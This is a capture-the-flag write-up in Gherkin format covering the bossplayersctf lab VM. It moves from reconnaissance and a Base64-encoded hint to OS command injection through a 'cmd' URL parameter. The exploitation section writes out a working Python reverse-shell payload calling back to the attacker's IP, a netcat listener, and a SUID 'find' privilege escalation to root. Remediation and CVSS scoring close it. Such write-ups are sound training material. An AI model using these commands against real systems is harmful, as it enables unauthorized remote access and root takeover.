## Version 1.4.1
## language: en

Feature:
  TOE:
    bossplayersctf
  Location:
    http://192.168.56.113/workinginprogress.php
  CWE:
    CWE-78: Improper Neutralization of Special Elements used in an OS
      Command ('OS Command Injection')
  Rule:
    REQ.173: https://fluidattacks.com/products/rules/list/173/
  Goal:
    Get remote connection and root privileges
  Recommendation:
    Must avoid or be careful with user inputs

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Kali            | 2021.1      |
    | Firefox         | 78.9.0esr   |
    | Nmap            | 7.91        |
    | VirtualBox      | 6.1         |
  TOE information:
    Given I have the machine Lab running on VMware [evidence](01.png)
    And It is in my network
    When I scan my network to find which ip was assigned to it
    And I use the next Nmap command to do it
    """
    nmap 192.168.56.0/24
    """
    Then I got the result
    """
    Nmap scan report for 192.168.56.113
    Host is up (0.00029s latency).
    Not shown: 998 closed ports
    PORT   STATE SERVICE
    22/tcp open  ssh
    80/tcp open  http
    """
    And I know its ip is 192.168.56.113
    And It has ports 22 (SSH) and 80 (HTTP) opened

  Scenario: Normal use case
    Given HTTP is working on port 80
    When I access to http://192.168.56.113
    Then I see the webpage [evidence](02.png)

  Scenario: Static detection
    Given I access to the source code in the main webpage
    When I analyze its content
    Then I can see an interesting comment
    """
    <!--WkRJNWVXRXliSFZhTW14MVkwaEtkbG96U214ak0wMTFZMGRvZDBOblBUMEsK-->
    """
    And I notice it looks like an encrypted message
    When I access to http://icyberchef.com/
    And I try for a while to decode it
    Then I find the message decoding it from Base64 3 times [evidence](03.png)
    And I try to access to
    """
    http://192.168.56.113/workinginprogress.php
    """
    And I get the webpage [evidence](04.png)

  Scenario: Dynamic detection
    Given I can access to http://192.168.56.113/workinginprogress.php
    And I notice there is a message that indicates to try a command like ping
    Then I suspect that exist a command injection vulnerability
    And after a while trying to find it I finally do it
    When I try the command "ls"
    """
    http://192.168.56.113/workinginprogress.php?cmd=ls
    """
    Then I get the result [evidence](05.png)
    And I confirm there is a command injection

  Scenario: Exploitation
    Given that vulnerability
    When I check if python is installed on the server with
    """
    http://192.168.56.113/workinginprogress.php?cmd=python --help
    """
    Then I confirm it is installed [evidence](06.png)
    And I think I can do a reverse shell
    When I init a Netcat listener with
    """
    nc -lvp 1234
    """
    And I use a python code to start the connection
    And I use the vulnerability to put the command with my attack box ip
    """
    http://192.168.56.113/workinginprogress.php?cmd=python -c
    'import socket,subprocess,os;s=socket.socket(socket.AF_INET,
    socket.SOCK_STREAM);s.connect(("192.168.56.105",1234));
    os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);
    p=subprocess.call(["/bin/bash","-i"]);'
    """
    Then I get remote connection with user www-data [evidence](07.png)
    When I try to find files or commands I can execute with root privileges
    """
    find / -perm -u=s -type f 2>/dev/null
    """
    Then I get
    """
    /usr/bin/mount
    /usr/bin/umount
    /usr/bin/gpasswd
    /usr/bin/su
    /usr/bin/chsh
    /usr/bin/grep
    /usr/bin/chfn
    /usr/bin/passwd
    /usr/bin/find
    /usr/bin/newgrp
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /usr/lib/openssh/ssh-keysign
    /usr/lib/eject/dmcrypt-get-device
    """
    And I know I can use find for privilege scalation using -exec property
    When I use the command
    """
    find . -exec /bin/sh -p \; -quit
    """
    Then I get root privileges [evidence](08.png)

  Scenario: Remediation
    Given I don't have access to the source code
    Then I assume cmd parameter is being directly executed
    And It is generating de vulnerability
    And It can be solved by validating untrusted inputs
    And avoiding executing commands in the OS if it's possible

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8.0/10 (High) - AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L/
  Temporal: Attributes that measure the exploit's popularity and fixability
    6.2/10 (Medium) - E:F/RL:O/RC:U/
  Environmental: Unique and relevant attributes to a specific user environment
    4.5/10 (Medium) - CR:L/IR:L/AR:L

  Scenario: Correlations
    No correlations have been found to this date 2021-03-31
